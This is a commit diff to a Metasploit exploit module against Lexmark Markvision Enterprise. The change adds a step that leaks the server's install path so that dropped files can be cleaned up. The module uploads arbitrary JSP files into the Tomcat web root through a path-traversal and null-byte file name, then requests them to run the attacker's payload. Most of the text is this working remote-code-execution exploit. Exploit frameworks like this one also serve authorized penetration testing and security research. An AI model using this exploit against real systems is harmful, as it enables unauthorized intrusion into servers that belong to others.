Info leak webapp ROOT so we can cleanup

Author: jvazquez-r7

modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb

@@ -8,6 +8,7 @@
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -44,7 +45,7 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(9788),
-        OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
+        OptString.new('TARGETURI', [true, 'ROOT path', '/'])
       ], self.class)
   end
 
@@ -68,21 +69,43 @@ def check
   end
 
   def exploit
-    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
-    jsp = payload.encoded
+    jsp_leak = jsp_path
+    jsp_name_leak = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
     # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
     # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT
-    traversal_attack = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name}\x00.pdf"
+    traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"
+
+    print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")
+    if upload_file(traversal_leak, jsp_leak)
+      print_good("#{peer} - JSP successfully updated")
+    else
+      fail_with(Failure::Unknown, "#{peer} - JSP update failed")
+    end
+
+    res = execute(jsp_name_leak)
+
+    if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/
+      upload_path = $1
+      print_good("#{peer} - Working directory found in #{upload_path}")
+      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak))
+    else
+      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
+    end
+
+    jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+    jsp_payload = payload.encoded
+    traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"
 
     print_status("#{peer} - Uploading JSP payload...")
-    if upload_file(traversal_attack, jsp)
+    if upload_file(traversal_payload, jsp_payload)
       print_good("#{peer} - JSP successfully updated")
+      register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name))
     else
       fail_with(Failure::Unknown, "#{peer} - JSP update failed")
     end
 
     print_status("#{peer} - Executing payload...")
-    send_request_cgi({'uri' => normalize_uri(target_uri.path.to_s, jsp_name)}, 3)
+    execute(jsp_payload_name, 3)
   end
 
   def upload_file(filename, contents)
@@ -109,4 +132,24 @@ def upload_file(filename, contents)
     end
   end
 
+  def execute(jsp_name, time_out = 20)
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path.to_s, jsp_name),
+      'method' => 'GET'
+    }, time_out)
+
+    res
+  end
+
+  def jsp_path
+    jsp =<<-EOS
+<%@ page language="Java" import="java.util.*"%>
+<%
+out.println("Path:" + System.getProperty("catalina.home"));
+%>
+    EOS
+
+    jsp
+  end
+
 end